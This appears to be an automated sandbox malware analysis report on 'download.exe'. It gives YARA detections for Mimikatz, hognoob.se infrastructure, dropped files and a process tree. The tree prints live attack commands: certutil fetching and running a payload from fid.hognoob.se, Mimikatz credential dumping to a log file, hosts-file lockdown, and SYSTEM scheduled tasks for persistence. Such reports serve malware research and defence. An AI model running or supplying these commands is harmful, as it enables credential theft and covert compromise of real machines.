4.2.sqlisrv.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
4.2.sqlisrv.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable Florian Roth
4.2.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
4.2.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
27.2.sqlisrv.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
27.2.sqlisrv.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
27.2.sqlisrv.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable Florian Roth
27.2.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
27.2.sqlisrv.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
12.1.b158ac7.exe.400000.0.unpack mimikatz mimikatz Benjamin DELPY (gentilkiwi)
12.1.b158ac7.exe.400000.0.unpack Mimikatz_Strings Detects Mimikatz strings Florian Roth
12.1.b158ac7.exe.400000.0.unpack Ping_Command_in_EXE Detects an suspicious ping command execution in an executable Florian Roth
12.1.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_errors Mimikatz credential dump tool: Error messages @fusionrace
12.1.b158ac7.exe.400000.0.unpack hacktool_windows_mimikatz_sekurlsa Mimikatz credential dump tool @fusionrace
Joe Sandbox View / Context
IPs
Match Associated Sample Name / URL SHA 256 Detection Link Context
195.128.126.120 fid.hognoob.se/download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini
fid.hognoob.se/download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini
fid.hognoob.se/download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini
fid.hognoob.se/download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini
download.exe Get hash malicious Browse uio.hognoob.se:63145/cfg.ini
Domains
Match Associated Sample Name / URL SHA 256 Detection Link Context
upa2.hognoob.se fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.237
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.237
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.254
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.159
download.exe Get hash malicious Browse 139.162.71.92
q1a.hognoob.se fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.254
download.exe Get hash malicious Browse 195.128.124.140
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140
download.exe Get hash malicious Browse 195.128.127.254
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.140
2019.ip138.com fid.hognoob.se/download.exe Get hash malicious Browse 117.25.157.119
fid.hognoob.se/download.exe Get hash malicious Browse 117.25.157.119
unloadcur.exe Get hash malicious Browse 125.77.198.152
unloadcur.exe Get hash malicious Browse 125.77.198.152
fid.hognoob.se/download.exe Get hash malicious Browse 117.25.157.119
fid.hognoob.se/download.exe Get hash malicious Browse 117.25.157.119
download.exe Get hash malicious Browse 117.25.157.119
upa1.hognoob.se fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.237
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.237
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.127.254
fid.hognoob.se/download.exe Get hash malicious Browse 195.128.124.159
download.exe Get hash malicious Browse 195.128.126.243
ASN
Match Associated Sample Name / URL SHA 256 Detection Link Context
unknown request.doc Get hash malicious Browse 192.168.0.44
FERK444259.doc Get hash malicious Browse 192.168.0.44
b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.js Get hash malicious Browse 192.168.0.40
Setup.exe Get hash malicious Browse 192.168.0.40
base64.pdf Get hash malicious Browse 192.168.0.40
file.pdf Get hash malicious Browse 192.168.0.40
Spread sheet 2.pdf Get hash malicious Browse 192.168.0.40
request_08.30.doc Get hash malicious Browse 192.168.0.44
P_2038402.xlsx Get hash malicious Browse 192.168.0.44
48b1cf747a678641566cd1778777ca72.apk Get hash malicious Browse 192.168.0.22
seu nome na lista de favorecidos.exe Get hash malicious Browse 192.168.0.40
Adm_Boleto.via2.com Get hash malicious Browse 192.168.0.40
QuitacaoVotorantim345309.exe Get hash malicious Browse 192.168.0.40
pptxb.pdf Get hash malicious Browse 192.168.0.40
unknown request.doc Get hash malicious Browse 192.168.0.44
FERK444259.doc Get hash malicious Browse 192.168.0.44
b392e93a5753601db564e6f2dc6a945aac3861bc31e2c1e5e7f3cd4e5bb150a4.js Get hash malicious Browse 192.168.0.40
Setup.exe Get hash malicious Browse 192.168.0.40
base64.pdf Get hash malicious Browse 192.168.0.40
file.pdf Get hash malicious Browse 192.168.0.40
Spread sheet 2.pdf Get hash malicious Browse 192.168.0.40
request_08.30.doc Get hash malicious Browse 192.168.0.44
P_2038402.xlsx Get hash malicious Browse 192.168.0.44
48b1cf747a678641566cd1778777ca72.apk Get hash malicious Browse 192.168.0.22
seu nome na lista de favorecidos.exe Get hash malicious Browse 192.168.0.40
Adm_Boleto.via2.com Get hash malicious Browse 192.168.0.40
QuitacaoVotorantim345309.exe Get hash malicious Browse 192.168.0.40
pptxb.pdf Get hash malicious Browse 192.168.0.40
JA3 Fingerprints
No context
Dropped Files
Match Associated Sample Name / URL SHA 256 Detection Link Context
C:\Windows\SysWOW64\ycemck.exe fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
C:\WebKitSdk\2.25.14\qwr4rt.exe fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
download.exe Get hash malicious Browse
fid.hognoob.se/download.exe Get hash malicious Browse
Screenshots
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
System is w10x64
download.exe (PID: 3076 cmdline: 'C:\Users\user\Desktop\download.exe' MD5: 31E46700743FAA4304532B36311E1177)
qwr4rt.exe (PID: 3308 cmdline: C:\WebKitSdk\2.25.14\qwr4rt.exe MD5: EABDC54C61088B769E9AF917AA6B05A4)
sqlisrv.exe (PID: 4748 cmdline: C:\WebKitSdk\2.25.14\sqlisrv.exe MD5: 1328C9CC50BD324399B4A83CA043BE6E)
cmd.exe (PID: 1896 cmdline: cmd /c ping 127.0.0.1 -n 8 & Start C:\Windows\cc3d3243\b158ac7.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 2560 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
PING.EXE (PID: 2864 cmdline: ping 127.0.0.1 -n 8 MD5: 70C24A306F768936563ABDADB9CA9108)
b158ac7.exe (PID: 5060 cmdline: C:\Windows\cc3d3243\b158ac7.exe MD5: 1328C9CC50BD324399B4A83CA043BE6E)
cmd.exe (PID: 4080 cmdline: cmd.exe /c certutil.exe -urlcache -split -f http://fid.hognoob.se/sqlisrv.exe %SystemRoot%\Temp\sqlisrv.exe & %SystemRoot%\Temp\sqlisrv.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 4960 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
certutil.exe (PID: 3304 cmdline: certutil.exe -urlcache -split -f http://fid.hognoob.se/sqlisrv.exe C:\Windows\Temp\sqlisrv.exe MD5: D056DF596F6E02A36841E69872AEF7BD)
sqlisrv.exe (PID: 652 cmdline: C:\Windows\Temp\sqlisrv.exe MD5: 1328C9CC50BD324399B4A83CA043BE6E)
ycemck.exe (PID: 3268 cmdline: C:\Windows\SysWOW64\ycemck.exe MD5: EABDC54C61088B769E9AF917AA6B05A4)
b158ac7.exe (PID: 3356 cmdline: C:\Windows\cc3d3243\b158ac7.exe MD5: 1328C9CC50BD324399B4A83CA043BE6E)
cmd.exe (PID: 3968 cmdline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 3384 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 1576 cmdline: C:\Windows\system32\cmd.exe /S /D /c' echo Y' MD5: F3BDBE3BB6F734E357235F4D5898582D)
cacls.exe (PID: 4728 cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
cmd.exe (PID: 2944 cmdline: C:\Windows\system32\cmd.exe /S /D /c' echo Y' MD5: F3BDBE3BB6F734E357235F4D5898582D)
cacls.exe (PID: 3632 cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
cmd.exe (PID: 4316 cmdline: C:\Windows\system32\cmd.exe /S /D /c' echo Y' MD5: F3BDBE3BB6F734E357235F4D5898582D)
cacls.exe (PID: 1252 cmdline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM MD5: 4CBB1C027DF71C53A8EE4C855FD35B25)
conhost.exe (PID: 3968 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
vfshost.exe (PID: 4240 cmdline: C:\Windows\5c2a55da8\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit MD5: FD5EFCCDE59E94EEC8BB2735AA577B2B)
netsh.exe (PID: 4864 cmdline: netsh ipsec static add policy name=Bastards description=FuckingBastards MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
netsh.exe (PID: 1784 cmdline: netsh ipsec static add filteraction name=BastardsList action=block MD5: A0AA3322BB46BBFC36AB9DC1DBBBB807)
conhost.exe (PID: 752 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 4068 cmdline: cmd /c C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe TCP 192.168.0.1 192.168.0.255 6666 32 MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
GogoleUpadte.exe (PID: 284 cmdline: C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe TCP 192.168.0.1 192.168.0.255 6666 32 MD5: 821EA58E3E9B6539FF0AFFD40E59F962)
cmd.exe (PID: 1252 cmdline: cmd /c C:\Windows\5c2a55da8\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\5c2a55da8\Corporate\log.txt MD5: F3BDBE3BB6F734E357235F4D5898582D)
cmd.exe (PID: 1524 cmdline: cmd /c cd C:\Windows\5c2a55da8\usbprohub\ & C:\Windows\5c2a55da8\usbprohub\\ouousbpro.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 1068 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
ouousbpro.exe (PID: 2940 cmdline: C:\Windows\5c2a55da8\usbprohub\\ouousbpro.exe MD5: C02C8BE9AFC220F8B7852C619AF784C6)
cmd.exe (PID: 1644 cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn '93293e638' /ru system /tr 'cmd /c C:\Windows\ime\b158ac7.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
cmd.exe (PID: 4448 cmdline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn 'd95544aa8' /ru system /tr 'cmd /c echo Y|cacls C:\Windows\cc3d3243\b158ac7.exe /p everyone:F' MD5: F3BDBE3BB6F734E357235F4D5898582D)
cleanup
Created / dropped Files
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C4E91F59715AA0FB54843EB617B4C0B5
Process: C:\Windows\SysWOW64\certutil.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Size (bytes): 4672000
Entropy (8bit): 7.82218228744185
Encrypted: false
MD5: 1328C9CC50BD324399B4A83CA043BE6E
SHA1: E4D3D2C3D65EA42606C6FA99BF796FBDE3CB16A3
SHA-256: 33F1D4D720D031615F5DB0462702E1B1DEE991FCFFFE5C17D7E3E1060DC95FA7
SHA-512: C6167DD7416DA0D42541A76884D533F5C5F45B21FC479FFEEBB44106141B8A1940D21B83A99E87C763B7267F0D7871213A467A933BC01B0C547EB3FCFE93E4F2
Malicious: true
Antivirus: Avira, Detection: 100%; Antivirus: Joe Sandbox ML, Detection: 100%; Antivirus: virustotal, Detection: 74%, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...].Rich~.].................PE..L......\.................PG..........._.......`...@.......................... `...............................................`.|...................................................................................................................UPX0....................................UPX1.....PG......BG.................@...UPX2..........`......FG.............@......................................................................................................................................................................................................................................................................................................................................................3.94.UPX!....
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C4E91F59715AA0FB54843EB617B4C0B5
Process: C:\Windows\SysWOW64\certutil.exe
File Type: data
Size (bytes): 220
Entropy (8bit): 2.9443655208446446
Encrypted: false
MD5: 1E600A0593C90A99148F16ECD4418654
SHA1: D489E9D2F74199D5C9EEFA91FEF427CF9682C2B2
SHA-256: 629899EA69863F8D6B31B2F55A83CD752DD127F0E7DCE716A7BC037501DD44C8
SHA-512: 37D907C38F0651CF4E3E09F46E73AE65C02FBCF88DDD9EC75039446AFDCECBEEC81840FE18D22D90CE0DF71DAC0ECB002B4AAFC00A176B7EC03A0D8C4B724C75
Malicious: false
Preview: p...... ....D...^...E...(....................................................... .................$............JG.h.t.t.p.:././.f.i.d...h.o.g.n.o.o.b...s.e./.s.q.l.i.s.r.v...e.x.e...".5.c.d.b.1.c.b.3.-.4.7.4.a.0.0."...
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\KSU5XQMC\sqlisrv[1].exe
Process: C:\Windows\SysWOW64\certutil.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Size (bytes): 4672000
Entropy (8bit): 7.82218228744185
Encrypted: false
MD5: 1328C9CC50BD324399B4A83CA043BE6E
SHA1: E4D3D2C3D65EA42606C6FA99BF796FBDE3CB16A3
SHA-256: 33F1D4D720D031615F5DB0462702E1B1DEE991FCFFFE5C17D7E3E1060DC95FA7
SHA-512: C6167DD7416DA0D42541A76884D533F5C5F45B21FC479FFEEBB44106141B8A1940D21B83A99E87C763B7267F0D7871213A467A933BC01B0C547EB3FCFE93E4F2
Malicious: true
Antivirus: Avira, Detection: 100%; Antivirus: Joe Sandbox ML, Detection: 100%; Antivirus: virustotal, Detection: 74%, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...].Rich~.].................PE..L......\.................PG..........._.......`...@.......................... `...............................................`.|...................................................................................................................UPX0....................................UPX1.....PG......BG.................@...UPX2..........`......FG.............@......................................................................................................................................................................................................................................................................................................................................................3.94.UPX!....
C:\WebKitSdk\2.25.14\qwr4rt.exe
Process: C:\Users\user\Desktop\download.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes): 73728
Entropy (8bit): 5.192189717439081
Encrypted: false
MD5: EABDC54C61088B769E9AF917AA6B05A4
SHA1: 14EE316DB299DF521B9EB37603D83F6750C1F1E6
SHA-256: 51E880F62A34CF8C49B343EFF2F94F75FB8060EDEA4F3B29E2230DC120D4D38F
SHA-512: 1BE88D2EDF5AD16B7F3DDFA08323A4A30C576C8A1528B179149713801D1A567A592DC8E36664D23DD95222ED614BD8BACC1AEC5E29A2240766F411FFF74BD997
Malicious: true
Antivirus: Avira, Detection: 100%; Antivirus: virustotal, Detection: 79%, Browse
Joe Sandbox View:
Filename: , Detection: malicious, Browse
Filename: , Detection: malicious, Browse
Filename: , Detection: malicious, Browse
Filename: , Detection: malicious, Browse
Filename: , Detection: malicious, Browse
Filename: download.exe, Detection: malicious, Browse
Filename: , Detection: malicious, Browse
Filename: download.exe, Detection: malicious, Browse
Filename: , Detection: malicious, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!m.\e...e...e.......d.......c.......d.......d.......n.......g...S*..f...S*..f...e...n.......l.......d...Riche...................PE..L....dY.................0...........5.......@....@.......................... ..............................................HU..x........'...........................................................................@[email protected]....).......0.................. ..`.rdata.......@... ...@..............@[email protected].......`.......`[email protected]....'.......0..................@..@................................................................................................................................................................................................................................................................................................................................................
C:\WebKitSdk\2.25.14\sqlisrv.exe
Process: C:\Users\user\Desktop\download.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Size (bytes): 4672000
Entropy (8bit): 7.82218228744185
Encrypted: false
MD5: 1328C9CC50BD324399B4A83CA043BE6E
SHA1: E4D3D2C3D65EA42606C6FA99BF796FBDE3CB16A3
SHA-256: 33F1D4D720D031615F5DB0462702E1B1DEE991FCFFFE5C17D7E3E1060DC95FA7
SHA-512: C6167DD7416DA0D42541A76884D533F5C5F45B21FC479FFEEBB44106141B8A1940D21B83A99E87C763B7267F0D7871213A467A933BC01B0C547EB3FCFE93E4F2
Malicious: true
Antivirus: Avira, Detection: 100%; Antivirus: Joe Sandbox ML, Detection: 100%; Antivirus: virustotal, Detection: 74%, Browse
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...].Rich~.].................PE..L......\.................PG..........._.......`...@.......................... `...............................................`.|...................................................................................................................UPX0....................................UPX1.....PG......BG.................@...UPX2..........`......FG.............@......................................................................................................................................................................................................................................................................................................................................................3.94.UPX!....
C:\Windows\5c2a55da8\Corporate\log.txt
Process: C:\Windows\5c2a55da8\Corporate\vfshost.exe
File Type: ASCII text, with CRLF line terminators
Size (bytes): 5272
Entropy (8bit): 5.000983475329759
Encrypted: false
MD5: 87C4B9B38AD26CE7D75AE5CBB5AB70CD
SHA1: 14AA5100593F4FF4B1442B8DBE1B82AF366FA572
SHA-256: 8D30C28FD9CAD4C41F3B08EBCF1CFCDB43696EEA36402EF61DBFC47EBF049752
SHA-512: BB4AD8C37ADBAAE57C8316463E2FDAA2C038F7B2371A1CE9F2183462FFAE111C47178C2583F269DB8FF0935DF182E23F866655F0E6614FAA56A8CAE21F46B9FD
Malicious: false
Yara Hits: Rule: Mimikatz_Logfile, Description: Detects a log file generated by malicious hack tool mimikatz, Source: C:\Windows\5c2a55da8\Corporate\log.txt, Author: Florian Roth
Preview: .. .#####. mimikatz 2.1.1 (x64) built on Aug 20 2018 01:54:02.. .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ** Kitten Edition **.. ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] ).. ## \ / ## > http://blog.gentilkiwi.com/mimikatz.. '## v ##' Vincent LE TOUX ( [email protected] ).. '#####' > http://pingcastle.com / http://mysmartlogon.com ***/....mimikatz(commandline) # privilege::debug..Privilege '20' OK....mimikatz(commandline) # sekurlsa::logonpasswords....Authentication Id : 0 ; 109316 (00000000:0001ab04)..Session : Interactive from 1..User Name : user..Domain : user-PC..Logon Server : user-PC..Logon Time : 11/22/2018 12:34:47 PM..SID : S-1-5-21-58933367-3072710494-194312298-1002...msv :.... [00000003] Primary... * Username : user... * Domain : user-PC... * NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0... * SHA1 : da39a3ee5e6b4b0d3255bfef95601890afd80709.
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_D.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 8CA1464A51A29D015663DC3E791C3A83
SHA1: 9E4C24A28F425E36105C1F4ED1ECCACC8E8CC751
SHA-256: CE82A1ACA23C7819E58743C6FED2ACB13BB3BE2568F3AD610F9F5C0ECC152B6E
SHA-512: FFA458ED752BCCA8081D978861695DCBBD3D359B91B731E3E02B3A390BCA5D390579CADFA57A50FCE2BA6E4B3AFEB6667A618489B1D55BE9BE56A514822A5228
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........D.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_E.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: B315CFEF01CEED20917E37FC8F27B4F8
SHA1: F559AC1E0B32D1620348BBA10EDC4590C511B1E6
SHA-256: F4340A46A82EFF16B9162D126235D514BBBA60B0E97100DCB372D6FA9DA04C48
SHA-512: 7BC148A312415E6911B0EC78B690935B2CA6D35B10E852B7708C0A9324267F2E376B2A770ACAAEE97934E04B903C1FFC0D7730D1E60B4AB6662DB0BA7D3EE8EE
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........E.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_F.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8032648063611956
Encrypted: false
MD5: 16EA7A2144E345FF3672977A4FB34987
SHA1: DF653DD612BFD0727FE3192601BA4DD3C6A9C60D
SHA-256: 52D00D6377B0E519A2EFFA3BBBD0E954E5AA04C7E6DE982C412D2A13F375B26C
SHA-512: 84BB329E1DA9C52A23C01A12CF205CC1AE3498B8F658EF4738A878473373AB82522CB35AC57A0AC616DA6F837192C0FEF6B404A711B922373CD001B7D9255525
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........F.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_G.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 5EFD382C6D4DC1A40350C35F305F26CA
SHA1: 3BD8240E9F1714360AF78D9781D690D78D075A58
SHA-256: 127D4531E464015A1E7F6E634902D165F4BE1AC13D1E72ED76003AEA1C647D03
SHA-512: E402B7283DD9256EB00F00AF4D1813518598560A9932C08F8A19282817C2AD6B454F13592C09C2BF5E15AAA9526FEF460FB9AEA64C5184E2C137D3403DFFB217
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........G.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_H.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 9E61781A23A323B787416E39B72B7A85
SHA1: E79349938938FB31B09DA0AB7C2858DB841D1CC8
SHA-256: 8CF1C6A97DDE0555E0F6B49103381713631A4493904A8375AD5D6D0937FBD3C2
SHA-512: 6768FDAB99D489043282C7ED72B6FC8F5CCD745E2066738FA6B3F47F2EDC687A3583800499B0EFAFB1AEBEDB6BE38AC78C6F00D81146F061471AFAA8CE8345F6
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........H.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_I.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: B350D7FCC319AAD19C5B1F0D05755D80
SHA1: 3D72504461902E443DB9799684E639F22349E965
SHA-256: CD0EE50E6C1C66C13BF74A79B5B7CDBEB663D4AC8484F6DDD9512933ECC9B8ED
SHA-512: F7C0AD5E51524C90D66B531C7DD4D00B6F5304F595705A15723915FE83CF8C044E121A3A82098DCB8432BB209597B06F11B17772CA1F105A345336C9107ADBB4
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........I.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_J.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 37EDF73CE2E3EA5F59644C457DEAF1BD
SHA1: B4C19996C04BA410122055ECE1BF1FF8F8FDE446
SHA-256: 52C90EAE20FB1F066B72598677E4B172EB2B84260890EAAADD1667A3F5389D28
SHA-512: F9049B1FC912142CE60820686701F7B2B7064DDD27239F54B83B6EC41FD979BAA61E38B04F9C0CF7C1D2FF16BC8E9ECA9C1E7873E24327470D5EDCB5D87B7D32
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........J.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_K.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 8EBAFFDDD3BFDC7F2B265A6604800613
SHA1: A3682A4115ADF7E6C3839F4992341B17673E2EBA
